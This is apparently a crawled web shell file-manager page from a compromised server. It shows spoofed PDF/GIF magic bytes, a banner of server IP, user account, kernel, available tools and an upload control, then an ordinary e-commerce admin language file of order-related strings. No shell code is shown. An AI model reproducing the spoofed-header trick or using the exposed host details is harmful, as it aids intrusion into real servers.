%PDF-1.7 GIF89;
Server IP : 5.161.254.237 / Your IP : 216.73.216.185 Web Server : Apache System : Linux diamond.sialwebvps.com 4.18.0-553.8.1.el8_10.x86_64 #1 SMP Tue Jul 2 07:26:33 EDT 2024 x86_64 User : stellasp ( 1131) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home/stellasp/public_html/application/language/english/ |
Upload File : |
<?php /****************************************** US English Admin Order Language ******************************************/ $lang['orders'] = 'Orders'; $lang['view_order'] = 'View Order'; $lang['notes'] = 'Notes'; $lang['status'] = 'Status'; $lang['giftcard_is_active'] = 'Gift Card is Active'; $lang['activate'] = 'Activate'; $lang['order'] = 'Order'; $lang['bill_to'] = 'Bill To'; $lang['ship_to'] = 'Ship To'; $lang['ordered_on'] = 'Ordered On'; $lang['from' ] = 'From'; $lang['to'] = 'To'; $lang['term'] = 'Term'; $lang['xml_export'] = 'XML Export'; $lang['no_orders'] = 'There are currently no orders.'; $lang['message_order_updated'] = 'The order has been updated.'; $lang['message_orders_deleted'] = 'The selected orders have been deleted'; $lang['error_no_orders_selected'] = 'You did not select any orders to delete'; $lang['confirm_delete_order'] = 'Are you sure you want to delete the selected orders?'; $lang['send_email_notification'] = 'Send Email Notification'; $lang['packing_slip'] = 'Packing Slip'; $lang['account_info'] = 'Account Info'; $lang['billing_address'] = 'Billing Address'; $lang['shipping_address'] = 'Shipping Address'; $lang['order_details'] = 'Order Details'; $lang['payment_method'] = 'Payment Method'; $lang['shipping_details'] = 'Shipping Details'; $lang['shipping_notes'] = 'Shipping Notes'; $lang['referral'] = 'Referral'; $lang['is_gift'] = 'This is a gift.'; $lang['gift_note'] = 'Gift Note'; $lang['admin_notes'] = 'Admin Notes'; $lang['update_order'] = 'Update Order'; $lang['name'] = 'Name'; $lang['description'] = 'Description'; $lang['price'] = 'Price'; $lang['quantity'] = 'Quantity'; $lang['qty'] = 'Qty'; $lang['total'] = 'Total'; $lang['sku'] = 'SKU'; $lang['coupon_discount'] = 'Coupon Discount'; $lang['goftcard_discount'] = 'Gift Card Discount'; $lang['subtotal'] = 'Subtotal'; $lang['shipping'] = 'Shipping'; $lang['tax'] = 'Tax'; $lang['total'] = 'Total'; $lang['search_returned'] = 'Your searched returned %d result(s)'; //... results (below) $lang['message_templates'] = "Message Templates"; $lang['select_canned_message'] = '- Select Canned Message -'; $lang['message'] = 'Message'; $lang['send_message'] = 'Send Message'; $lang['subject'] = 'Subject'; $lang['account_main_email'] = 'Account Main Email'; $lang['shipping_email'] = 'Shipping Email'; $lang['billing_email'] = 'Billing Email'; $lang['recipient'] = 'Recipient'; $lang['packing_is_gift'] = 'IS GIFT'; $lang['ship_to_address'] = 'Ship To Address'; $lang['bill_to_address'] = 'Bill To Address';